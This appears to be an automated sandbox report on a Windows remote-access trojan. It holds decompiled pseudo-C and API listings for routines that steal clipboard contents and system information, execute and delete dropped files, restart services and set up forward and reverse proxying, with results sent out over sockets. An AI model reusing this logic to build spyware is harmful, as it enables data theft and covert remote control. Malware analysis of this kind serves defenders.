                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: (F$(F$hpg
                                                                                                • API String ID: 3795512280-2326968899
                                                                                                • Opcode ID: aee7ea58b02299a83eb969c0d8e9f43ae53927dc5c01a3b69301c737bed604f8
                                                                                                • Instruction ID: f39d74aea4cda4c837f7a9e75c11e0b175b8514aeed9f647f35e0db018923d00
                                                                                                • Opcode Fuzzy Hash: aee7ea58b02299a83eb969c0d8e9f43ae53927dc5c01a3b69301c737bed604f8
                                                                                                • Instruction Fuzzy Hash: EC517F7160420057CB15BB72C956AAF7799AF90308F04093FF942BB2E2EF7C9D45869E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E004055A6(char* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                				struct tagMSG _v52;
                                                                                                				void* _v56;
                                                                                                				char _v60;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				char _v84;
                                                                                                				char _v104;
                                                                                                				char _v108;
                                                                                                				void* _v112;
                                                                                                				char _v116;
                                                                                                				char _v120;
                                                                                                				char _v140;
                                                                                                				void* _v176;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t28;
                                                                                                				char* _t36;
                                                                                                				intOrPtr _t45;
                                                                                                				intOrPtr _t46;
                                                                                                				void* _t57;
                                                                                                				intOrPtr _t69;
                                                                                                				void* _t111;
                                                                                                				void* _t113;
                                                                                                				void* _t115;
                                                                                                				signed int _t117;
                                                                                                				void* _t120;
                                                                                                				void* _t121;
                                                                                                				void* _t122;
                                                                                                				void* _t123;
                                                                                                
                                                                                                				_t125 = __eflags;
                                                                                                				_t101 = __edx;
                                                                                                				_t69 = _a4;
                                                                                                				E004020DE(_t69,  &_v104, __edx, __eflags, _t69 + 0xc);
                                                                                                				SetEvent( *(_t69 + 0x24));
                                                                                                				_t28 = E00401F87( &_v108);
                                                                                                				E00404287( &_v108,  &_v60, 4, 0xffffffff);
                                                                                                				_t120 = (_t117 & 0xfffffff8) - 0x5c;
                                                                                                				E004020DE(_t69, _t120, _t101, _t125, 0x46e250);
                                                                                                				_t121 = _t120 - 0x18;
                                                                                                				E004020DE(_t69, _t121, _t101, _t125,  &_v76);
                                                                                                				E00417E68( &_v140, _t101);
                                                                                                				_t122 = _t121 + 0x30;
                                                                                                				_t111 =  *_t28 - 0x3a;
                                                                                                				if(_t111 == 0) {
                                                                                                					E00401E3B( &_v116, _t101, __eflags, 0);
                                                                                                					_t36 = E0040247B();
                                                                                                					E00401F87(E00401E3B( &_v120, _t101, __eflags, 0));
                                                                                                					_t101 = _t36;
                                                                                                					_t113 = E0040F6D9();
                                                                                                					__eflags = _t113;
                                                                                                					if(_t113 == 0) {
                                                                                                						L7:
                                                                                                						E00401E66( &_v116, _t101);
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						__eflags = 0;
                                                                                                						return 0;
                                                                                                					}
                                                                                                					 *0x46dae0 = E0040F96F(_t113, "DisplayMessage");
                                                                                                					_t45 = E0040F96F(_t113, "GetMessage");
                                                                                                					_t104 = "CloseChat";
                                                                                                					 *0x46dad8 = _t45;
                                                                                                					_t46 = E0040F96F(_t113, "CloseChat");
                                                                                                					_t123 = _t122 - 0x18;
                                                                                                					 *0x46dadc = _t46;
                                                                                                					 *0x46dad5 = 1;
                                                                                                					E004020DE(_t69, _t123, "CloseChat", __eflags, 0x46e2e8);
                                                                                                					_push(0x74);
                                                                                                					E00404BB7(_t69, _t69, _t104, __eflags);
                                                                                                					L10:
                                                                                                					_t115 = HeapCreate(0, 0, 0);
                                                                                                					__eflags =  *0x46dad8(_t115,  &_v140);
                                                                                                					if(__eflags != 0) {
                                                                                                						_t123 = _t123 - 0x18;
                                                                                                						E0040209D(_t69, _t123, _t104, __eflags, _v140, _t51);
                                                                                                						_push(0x3b);
                                                                                                						E00404BB7(_t69, _t69, _t104, __eflags);
                                                                                                						HeapFree(_t115, 0, _v176);
                                                                                                					}
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				_t127 = _t111 != 1;
                                                                                                				if(_t111 != 1) {
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				_t57 =  *0x46dae0(E00401F87(E00401E3B( &_v116, _t101, _t127, 0)));
                                                                                                				_t128 = _t57;
                                                                                                				if(_t57 == 0) {
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				E00404260(_t69,  &_v80, 0x460730);
                                                                                                				_t101 =  &_v84;
                                                                                                				E00417D8C(_t69, _t122 - 0x18,  &_v84);
                                                                                                				_push(0x3b);
                                                                                                				E00404BB7(_t69, _t69,  &_v84, _t128);
                                                                                                				E00401EE2();
                                                                                                				L4:
                                                                                                				while(GetMessageA( &_v52, 0, 0, 0) > 0) {
                                                                                                					TranslateMessage( &_v52);
                                                                                                					DispatchMessageA( &_v52);
                                                                                                				}
                                                                                                				if(__eflags < 0) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				goto L7;
                                                                                                			}


                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 004055C5
                                                                                                • GetMessageA.USER32 ref: 00405675
                                                                                                • TranslateMessage.USER32(?), ref: 00405684
                                                                                                • DispatchMessageA.USER32 ref: 0040568F
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,0046E2E8), ref: 00405747
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040577F
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 1a1f68142079bd1bee5c8deb1a08623b7a58e4bc293f1c57fec94a65ed8ee932
                                                                                                • Instruction ID: 73570ff1bb1f1cc7f1c06208e28152544e8fd6e892a2dbfdeb0425977fc91e32
                                                                                                • Opcode Fuzzy Hash: 1a1f68142079bd1bee5c8deb1a08623b7a58e4bc293f1c57fec94a65ed8ee932
                                                                                                • Instruction Fuzzy Hash: D841AE716083005BCA14BB76DC4A96F77A9ABC1708F40093EF946A71E1EF789905CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E00414719(void* __eflags, char _a4, char _a28) {
                                                                                                				char _v28;
                                                                                                				struct _SHELLEXECUTEINFOA _v88;
                                                                                                				char _v112;
                                                                                                				char _v136;
                                                                                                				char _v316;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t33;
                                                                                                				void* _t41;
                                                                                                				intOrPtr _t50;
                                                                                                				signed int _t60;
                                                                                                				char* _t68;
                                                                                                				void* _t73;
                                                                                                				void* _t87;
                                                                                                				void* _t90;
                                                                                                
                                                                                                				_t93 = __eflags;
                                                                                                				_t33 = E00402076(_t60,  &_v136, "\\");
                                                                                                				_t86 = E004053F2(_t60,  &_v112, E00437AFA(_t60, __eflags, "Temp"), _t87, _t93, _t33);
                                                                                                				E00402F85(_t60,  &_v28, _t35, _t93,  &_a4);
                                                                                                				E00401FB9();
                                                                                                				_t68 =  &_v136;
                                                                                                				E00401FB9();
                                                                                                				_push(_t68);
                                                                                                				_push(_t68);
                                                                                                				_t41 = E00414956(E0040D58E( &_v316, _t35, _t93, E00401F87( &_v28), 0x10),  &_v316);
                                                                                                				_t94 = _t41;
                                                                                                				if(_t41 == 0) {
                                                                                                					E00402076(_t60, _t90 - 0x18, 0x460734);
                                                                                                					_push(0x6f);
                                                                                                					_t73 = 0x46e8e0;
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					_t86 =  &_a28;
                                                                                                					E00414966( &_v316,  &_a28, _t94);
                                                                                                					E0040D53F( &_v316,  &_a28, _t94);
                                                                                                					_v88.hwnd = _v88.hwnd & 0x00000000;
                                                                                                					_v88.lpVerb = _v88.lpVerb & 0x00000000;
                                                                                                					_v88.cbSize = 0x3c;
                                                                                                					_v88.fMask = 0x40;
                                                                                                					_t50 = E00401F87( &_v28);
                                                                                                					asm("movaps xmm0, [0x4671b0]");
                                                                                                					_v88.lpFile = _t50;
                                                                                                					asm("movups [ebp-0x40], xmm0");
                                                                                                					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
                                                                                                					_t96 = _v88.hProcess;
                                                                                                					if(_v88.hProcess != 0) {
                                                                                                						E00402076(_t60, _t90, 0x460734);
                                                                                                						_push(0x70);
                                                                                                						E00404BB7(_t60, 0x46e8e0,  &_a28, _t96);
                                                                                                						WaitForSingleObject(_v88.hProcess, 0xffffffff);
                                                                                                						CloseHandle(_v88.hProcess);
                                                                                                						DeleteFileA(E00401F87( &_v28));
                                                                                                					}
                                                                                                					_t97 = _t60 - 1;
                                                                                                					if(_t60 == 1) {
                                                                                                						E00402076(_t60, _t90 - 0x18, 0x460734);
                                                                                                						_push(0x6e);
                                                                                                						_t73 = 0x46e8e0;
                                                                                                						L6:
                                                                                                						E00404BB7(_t60, _t73, _t86, _t97);
                                                                                                					}
                                                                                                				}
                                                                                                				E0040CC8C(_t60,  &_v316, 0x460734);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return E00401FB9();
                                                                                                 			}

                                                                                                APIs
                                                                                                  • Part of subcall function 00414966: __EH_prolog.LIBCMT ref: 0041496B
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00460734), ref: 00414816
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041481F
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0041482E
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004147E2
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$Temp$F$F
                                                                                                • API String ID: 1704390241-1252452680
                                                                                                • Opcode ID: f406f2f5dc46aebd4e3411db8e43c2a3def82ec31058e40fe901cc061d475275
                                                                                                • Instruction ID: 858942575bebabafb25a70dd3938041a6e54752a0859ac0cf24d94d35a2d3125
                                                                                                • Opcode Fuzzy Hash: f406f2f5dc46aebd4e3411db8e43c2a3def82ec31058e40fe901cc061d475275
                                                                                                • Instruction Fuzzy Hash: D241AF319002099BCB14FBA2DC46AEEB778AF50348F40427EF505760E1EF785E89CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E00414091(void* __ecx, void* __edi, void* __eflags, char _a4) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v204;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t35;
                                                                                                				void* _t46;
                                                                                                				void* _t54;
                                                                                                				void* _t55;
                                                                                                				void* _t89;
                                                                                                				void* _t91;
                                                                                                
                                                                                                				_t93 = __eflags;
                                                                                                				_t89 = __edi;
                                                                                                				E00403098(_t54,  &_v76, E00404260(_t54,  &_v52, E00437AEF(_t54, __ecx, __eflags, L"temp")), _t89, _t93, L"\\sysinfo.txt");
                                                                                                				E00401EE2();
                                                                                                				_t55 = 0;
                                                                                                				ShellExecuteW(0, L"open", L"dxdiag", E00401EDD(E00409E9E( &_v52, L"/t ", 0,  &_v76)), 0, 0);
                                                                                                				E00401EE2();
                                                                                                				E004020C7(0,  &_v28);
                                                                                                				_t90 = 0;
                                                                                                				do {
                                                                                                					_t35 = E00401EDD( &_v76);
                                                                                                					_t87 =  &_v28;
                                                                                                					E004183CC(_t35,  &_v28);
                                                                                                					Sleep(0x64);
                                                                                                					_t90 = _t90 + 1;
                                                                                                				} while (E00409DEA() != 0 && _t90 < 0x4b0);
                                                                                                				if(E00409DEA() == 0) {
                                                                                                					DeleteFileW(E00401EDD( &_v76));
                                                                                                					E004047EF(1);
                                                                                                					_t46 = E004049DE( &_v204, _t90,  &_v204);
                                                                                                					_t98 = _t46;
                                                                                                					if(_t46 != 0) {
                                                                                                						_t90 = _t91 - 0x18;
                                                                                                						_t16 =  &_a4; // 0x413cef
                                                                                                						_t87 = E00402FA9( &_v52, _t16, 0x46e250);
                                                                                                						E00402F85(_t55, _t91 - 0x18, _t49, _t98,  &_v28);
                                                                                                						_push(0x97);
                                                                                                						E00404BB7(_t55,  &_v204, _t49, _t98);
                                                                                                						E00401FB9();
                                                                                                						E00404F18( &_v204, _t49);
                                                                                                						_t55 = 1;
                                                                                                					}
                                                                                                					E00404FD6(_t55,  &_v204, _t87, _t90);
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				E00401EE2();
                                                                                                				E00401FB9();
                                                                                                				return _t55;
                                                                                                 			}

                                                                                                APIs
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004140F1
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041411D
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00414151
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp$<A
                                                                                                • API String ID: 2701014334-875816778
                                                                                                • Opcode ID: 1f4c31613ceb57c7a0bbab8a0d43d4546bf6927b26996f6ecc86e74b0424a019
                                                                                                • Instruction ID: 358ac715407f0ab7af5aa6b9de861fc6436c43dce166b1ad661bb97e2f0cc309
                                                                                                • Opcode Fuzzy Hash: 1f4c31613ceb57c7a0bbab8a0d43d4546bf6927b26996f6ecc86e74b0424a019
                                                                                                • Instruction Fuzzy Hash: 57312F719001196ADB04FBA1DC96DEEB778AF50308F40017FF906771D2EE785E8ACA99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E00413797(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
                                                                                                				void* __ebx;
                                                                                                				void* _t16;
                                                                                                				struct HWND__* _t23;
                                                                                                				void* _t38;
                                                                                                				void* _t41;
                                                                                                
                                                                                                				if(OpenClipboard(_t23) != 0) {
                                                                                                					EmptyClipboard();
                                                                                                					CloseClipboard();
                                                                                                					if(OpenClipboard(_t23) != 0) {
                                                                                                						_t38 = GetClipboardData(0xd);
                                                                                                						_t16 = GlobalLock(_t38);
                                                                                                						GlobalUnlock(_t38);
                                                                                                						CloseClipboard();
                                                                                                						_t29 =  !=  ? _t16 : 0x46079c;
                                                                                                						E00404260(_t23,  &_a36,  !=  ? _t16 : 0x46079c);
                                                                                                						_t34 =  &_a32;
                                                                                                						E00417D8C(_t23, _t41 - 0x18,  &_a32);
                                                                                                						_push(0x6b);
                                                                                                						E00404BB7(_t23, 0x46e848,  &_a32, _t16);
                                                                                                						E00401EE2();
                                                                                                					}
                                                                                                				}
                                                                                                				E00401E66( &_a16, _t34);
                                                                                                				E00401FB9();
                                                                                                				E00401FB9();
                                                                                                				return 0;
                                                                                                			}









                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00413798
                                                                                                • EmptyClipboard.USER32 ref: 004137A6
                                                                                                • CloseClipboard.USER32 ref: 004137AC
                                                                                                • OpenClipboard.USER32 ref: 004137B3
                                                                                                • GetClipboardData.USER32 ref: 004137C3
                                                                                                • GlobalLock.KERNEL32 ref: 004137CC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004137D5
                                                                                                • CloseClipboard.USER32 ref: 004137DB
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID: HF
                                                                                                • API String ID: 2172192267-543897734
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E00416E36(char _a4) {
                                                                                                				intOrPtr _v28;
                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                				int _t22;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t22 = 0;
                                                                                                				_t27 = OpenSCManagerW(0, 0, 0x11);
                                                                                                				_t26 = OpenServiceW(_t27, E00401EDD( &_a4), 0xf003f);
                                                                                                				if(_t26 != 0) {
                                                                                                					if(ControlService(_t26, 1,  &_v32) != 0) {
                                                                                                						do {
                                                                                                							QueryServiceStatus(_t26,  &_v32);
                                                                                                						} while (_v28 != 1);
                                                                                                						StartServiceW(_t26, 0, 0);
                                                                                                						asm("sbb ebx, ebx");
                                                                                                						_t22 = 3;
                                                                                                						CloseServiceHandle(_t27);
                                                                                                						CloseServiceHandle(_t26);
                                                                                                					} else {
                                                                                                						CloseServiceHandle(_t27);
                                                                                                						CloseServiceHandle(_t26);
                                                                                                						_t22 = 2;
                                                                                                					}
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t27);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t22;
                                                                                                			}









                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,004167DD,00000000), ref: 00416E45
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004167DD,00000000), ref: 00416E5C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E69
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004167DD,00000000), ref: 00416E78
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E89
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E8C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00442E74(char _a4) {
                                                                                                				char _v8;
                                                                                                
                                                                                                				_t26 = _a4;
                                                                                                				_t52 =  *_a4;
                                                                                                				if( *_a4 != 0x458280) {
                                                                                                					E004414D5(_t52);
                                                                                                					_t26 = _a4;
                                                                                                				}
                                                                                                				E004414D5( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                				E004414D5( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                				_v8 =  &_a4;
                                                                                                				E00442D3A(5,  &_v8);
                                                                                                				_v8 =  &_a4;
                                                                                                				return E00442D8A(4,  &_v8);
                                                                                                			}





                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00442E88
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 00442E94
                                                                                                • _free.LIBCMT ref: 00442E9F
                                                                                                • _free.LIBCMT ref: 00442EAA
                                                                                                • _free.LIBCMT ref: 00442EB5
                                                                                                • _free.LIBCMT ref: 00442EC0
                                                                                                • _free.LIBCMT ref: 00442ECB
                                                                                                • _free.LIBCMT ref: 00442ED6
                                                                                                • _free.LIBCMT ref: 00442EE1
                                                                                                • _free.LIBCMT ref: 00442EEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 66%
                                                                                                			E0040EEE1(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                				char _v32;
                                                                                                				char _v56;
                                                                                                				void* _v60;
                                                                                                				char _v72;
                                                                                                				char _v76;
                                                                                                				char _v80;
                                                                                                				char _v88;
                                                                                                				char _v92;
                                                                                                				void* _v96;
                                                                                                				char _v108;
                                                                                                				char _v112;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t26;
                                                                                                				char* _t34;
                                                                                                				char* _t37;
                                                                                                				intOrPtr _t50;
                                                                                                				char* _t51;
                                                                                                				char* _t58;
                                                                                                				intOrPtr _t60;
                                                                                                				intOrPtr _t61;
                                                                                                				char* _t65;
                                                                                                				void* _t68;
                                                                                                				intOrPtr _t121;
                                                                                                				void* _t125;
                                                                                                				void* _t128;
                                                                                                				void* _t130;
                                                                                                				void* _t131;
                                                                                                				void* _t133;
                                                                                                				signed int _t135;
                                                                                                				void* _t138;
                                                                                                				void* _t139;
                                                                                                				void* _t140;
                                                                                                				void* _t144;
                                                                                                
                                                                                                				_t146 = __eflags;
                                                                                                				_t111 = __edx;
                                                                                                				_push(_t68);
                                                                                                				_t121 = _a4;
                                                                                                				E004020DE(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
                                                                                                				SetEvent( *(_t121 + 0x24));
                                                                                                				_t26 = E00401F87( &_v80);
                                                                                                				E00404287( &_v80,  &_v56, 4, 0xffffffff);
                                                                                                				_t138 = (_t135 & 0xfffffff8) - 0x3c;
                                                                                                				E004020DE(0x46e250, _t138, _t111, _t146, 0x46e250);
                                                                                                				_t139 = _t138 - 0x18;
                                                                                                				E004020DE(0x46e250, _t139, _t111, _t146,  &_v72);
                                                                                                				E00417E68( &_v112, _t111);
                                                                                                				_t140 = _t139 + 0x30;
                                                                                                				_t125 =  *_t26 - 0x46;
                                                                                                				if(_t125 == 0) {
                                                                                                					E00401E3B( &_v88, _t111, __eflags, 1);
                                                                                                					_t34 = E0040247B();
                                                                                                					E00401F87(E00401E3B( &_v92, _t111, __eflags, 1));
                                                                                                					_t112 = _t34;
                                                                                                					_t37 = E0040F6D9();
                                                                                                					_t127 = _t37;
                                                                                                					__eflags = _t37;
                                                                                                					if(__eflags == 0) {
                                                                                                						_t128 = _t140 - 0x18;
                                                                                                						_push("1");
                                                                                                						L19:
                                                                                                						_t111 = E00402FA9( &_v32, E00401E3B( &_v88, _t112, __eflags, 0), 0x46e250);
                                                                                                						E004076BB(0x46e250, _t128, _t39, _t121, __eflags);
                                                                                                						_push(0x85);
                                                                                                						E00404BB7(0x46e250, _t121, _t39, __eflags);
                                                                                                						E00401FB9();
                                                                                                						L20:
                                                                                                						E00401E66( &_v108, _t111);
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                						return 0;
                                                                                                					}
                                                                                                					 *0x46dd30 = E0040F96F(_t127, "StartForward");
                                                                                                					 *0x46dd2c = E0040F96F(_t127, "StartReverse");
                                                                                                					 *0x46dd34 = E0040F96F(_t127, "StopForward");
                                                                                                					_t50 = E0040F96F(_t127, "StopReverse");
                                                                                                					_t112 = "GetDirectListeningPort";
                                                                                                					 *0x46dd3c = _t50;
                                                                                                					_t51 = E0040F96F(_t127, "GetDirectListeningPort");
                                                                                                					__eflags =  *0x46dd30;
                                                                                                					 *0x46dd38 = _t51;
                                                                                                					if(__eflags == 0) {
                                                                                                						L17:
                                                                                                						_t128 = _t140 - 0x18;
                                                                                                						_push("2");
                                                                                                						goto L19;
                                                                                                					}
                                                                                                					__eflags =  *0x46dd2c;
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					__eflags =  *0x46dd34;
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					__eflags = _t51;
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					 *0x46dd40 = 1;
                                                                                                					E004020DE(0x46e250, _t140 - 0x18, "GetDirectListeningPort", __eflags, E00401E3B( &_v88, "GetDirectListeningPort", __eflags, 0));
                                                                                                					_push(0x76);
                                                                                                					L10:
                                                                                                					E00404BB7(0x46e250, _t121, _t112, __eflags);
                                                                                                					goto L20;
                                                                                                				}
                                                                                                				_t130 = _t125 - 1;
                                                                                                				if(_t130 == 0) {
                                                                                                					_t58 =  *0x46dd30(E004374E4(_t55, E00401F87(E00401E3B( &_v88, _t111, __eflags, 0))));
                                                                                                					_t144 = _t140 - 0x14;
                                                                                                					L9:
                                                                                                					_t112 = _t58;
                                                                                                					E00417C16(0x46e250, _t144, _t58);
                                                                                                					_push(0x77);
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				_t131 = _t130 - 1;
                                                                                                				if(_t131 == 0) {
                                                                                                					_t60 =  *0x46dacc; // 0x0
                                                                                                					_t61 =  *((intOrPtr*)(_t60 + 0x18));
                                                                                                					__imp__#12( *((intOrPtr*)(_t61 + 4)));
